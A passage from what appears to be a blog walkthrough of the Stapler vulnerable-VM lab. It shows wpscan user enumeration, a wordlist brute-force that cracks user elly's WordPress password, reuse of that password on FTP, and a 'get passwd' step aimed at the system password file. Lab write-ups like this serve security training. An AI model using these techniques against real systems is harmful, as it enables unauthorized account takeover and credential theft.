<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI078b2mnLZUeVwUUACDIzbuQPsLHx8pj_oEkvJ0KL3N4gBFJM1QKWTpKtXddE_-NsBlS0UPNhh004WzCPt74Fdxfn2TNArbnvfrbcu9-GMWqxCHK8bePoW_bO4o7IbCSnlsqNvDk2rIk/s1600/112233.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI078b2mnLZUeVwUUACDIzbuQPsLHx8pj_oEkvJ0KL3N4gBFJM1QKWTpKtXddE_-NsBlS0UPNhh004WzCPt74Fdxfn2TNArbnvfrbcu9-GMWqxCHK8bePoW_bO4o7IbCSnlsqNvDk2rIk/s640/112233.bmp" width="640" /></a></div>
<br />
Moving on...<br />
<br />
blogblog reveals itself as a WordPress site. Sweet. If we get a credential, hopefully we can edit a theme and drop a rev shell or RCE.<br />
<br />
For this next part i am going to use <b>wpscan</b> to find everything of value (If you are looking for another awesome tutorial, a video one, check out <a href="https://7ms.us/">https://7ms.us</a> Brian does a great job of explaining what flags to use for wpscan. Thanks Brian <a href="http://twitter.com/@7minsec">@7minsec</a>)<br />
<br />
Command: wpscan --url https://192.168.153.142:12380/blogblog/ -e u[1-20] -e a<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">_______________________________________________________________</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">__ _______ _____</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\ \ / / __ \ / ____|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\ \ /\ / /| |__) | (___ ___ __ _ _ __</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\ /\ / | | ____) | (__| (_| | | | |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\/ \/ |_| |_____/ \___|\__,_|_| |_|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">WordPress Security Scanner by the WPScan Team</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Version 2.9.1</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Sponsored by Sucuri - https://sucuri.net</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">_______________________________________________________________</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] URL: https://192.168.153.142:12380/blogblog/</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Started: Mon Jun 27 11:17:31 2016</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] The WordPress 'https://192.168.153.142:12380/blogblog/readme.html' file exists exposing a version number</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Interesting header: DAVE: Soemthing doesn't look right here</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] Registration is enabled: https://192.168.153.142:12380/blogblog/wp-login.php?action=register</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] XML-RPC Interface available under: https://192.168.153.142:12380/blogblog/xmlrpc.php</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] Upload directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-content/uploads/</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] Includes directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-includes/</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] 21 vulnerabilities identified from the version number</td></tr>
</tbody></table>
So we know that it is running version 4.2.1 with 21 vulnerabilities...nice... But i want to see what (if any) users could be found.
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Enumerating usernames ...</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Identified the following 16 user/s:</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+---------+-----------------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| Id | Login | Name |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+---------+-----------------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 1 | john | John Smith |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 2 | elly | Elly Jones |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 3 | peter | Peter Parker |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 4 | barry | Barry Atkins |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 5 | heather | Heather Neville |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 6 | garry | garry |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 7 | harry | harry |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 8 | scott | scott |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 9 | kathy | kathy |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 10 | tim | tim |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 11 | zoe | ZOE |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 12 | dave | Dave |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 13 | simon | Simon |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 14 | abby | Abby |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 15 | vicki | Vicki |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 16 | pam | Pam |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+---------+-----------------+</td></tr>
</tbody></table>
Damn.... Thats alot of users, some of which look pretty familiar:<br />
<span style="font-family: inherit;"><span style="font-size: small;">pam</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">dave</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">zoe</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">tim</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">garry</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">harry</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">barry</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">peter</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">john</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">elly</span></span><br />
<br />
I remember seeing a message for elly stating that there was a payload waiting for her in her ftp account... or something like that. lets see if wpscan can brute her password.<br />
Command: wpscan --url https://192.168.153.142:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou_5max.txt --username elly<br />
<br />
<b>****NOTE: rockyou_5max.txt is just the rockyou list but only the words that are 5 chars or less****</b><br />
<b>****NOTE v2.0: I created a bruteforcer in python for finding the password also, as a codemonkey i feel the need to always try on my own. If anyone wants it feel free to leave a comment and i can share with you****</b><br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Enumerating plugins from passive detection ...</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] No plugins found</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Starting the password brute forcer</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] [SUCCESS] Login : elly Password : ylle</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Brute Forcing 'elly' Time: 00:18:01 </td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+-------+------+----------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| Id | Login | Name | Password |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+-------+------+----------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| | elly | | ylle |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+-------+------+----------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Finished: Mon Jun 27 11:46:55 2016</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Requests Done: 99717</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Memory used: 42.395 MB</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Elapsed time: 00:18:04</td></tr>
</tbody></table>
<br />
Ooh... elly was cracked with the password of ylle.<br />
Lets switch back and try her credentials on the ftp service and see if we get lucky with some password reuse.<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler# ftp 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Connected to 192.168.153.142.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-|-----------------------------------------------------------------------------------------|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-|-----------------------------------------------------------------------------------------|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Name (192.168.153.142:root): elly</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">331 Please specify the password.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Password:</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">230 Login successful.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Remote system type is UNIX.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Using binary mode to transfer files.</td></tr>
</tbody></table>
<br />
Bingo... but what can we see<br />
Command: ls
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> ls</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">200 PORT command successful. Consider using PASV.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">150 Here comes the directory listing.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 07 01:57 alternatives</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 8 0 0 4096 Jun 03 17:46 apache2</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apparmor</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 9 0 0 4096 Jun 06 23:17 apparmor.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apport</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 6 0 0 4096 Jun 03 14:05 apt</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r----- 1 0 1 144 Jan 14 23:35 at.deny</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 5 0 0 4096 Jun 03 14:47 authbind</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:52 bash_completion.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 367 Jan 27 15:17 bindresvport.blacklist</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Apr 12 11:30 binfmt.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 byobu</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ca-certificates</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 7788 Jun 03 13:51 ca-certificates.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 console-setup</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 19:13 cron.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 17:07 cron.daily</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">26</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.hourly</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">27</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.monthly</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">28</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 cron.weekly</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">29</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 722 Apr 05 22:59 crontab</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">30</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 54 Jun 03 13:51 crypttab</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">31</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 04 00:02 dbconfig-common</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">32</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 4 0 0 4096 Jun 03 13:51 dbus-1</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">33</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">34</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">35</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 05 23:04 default</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">36</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">37</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 depmod.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">38</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 dhcp</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">39</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">40</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 14:19 dnsmasq.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">41</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 4 0 0 4096 Jun 07 01:57 dpkg</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">42</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 96 Apr 20 23:09 environment</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">43</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 4 0 0 4096 Jun 03 14:18 fonts</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">44</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 594 Jun 03 13:49 fstab</td></tr>
</tbody></table>
<br />
/etc = lulz lets grab the passwd file and see if any of our potential users are actual users<br />
Command: get passwd<br />
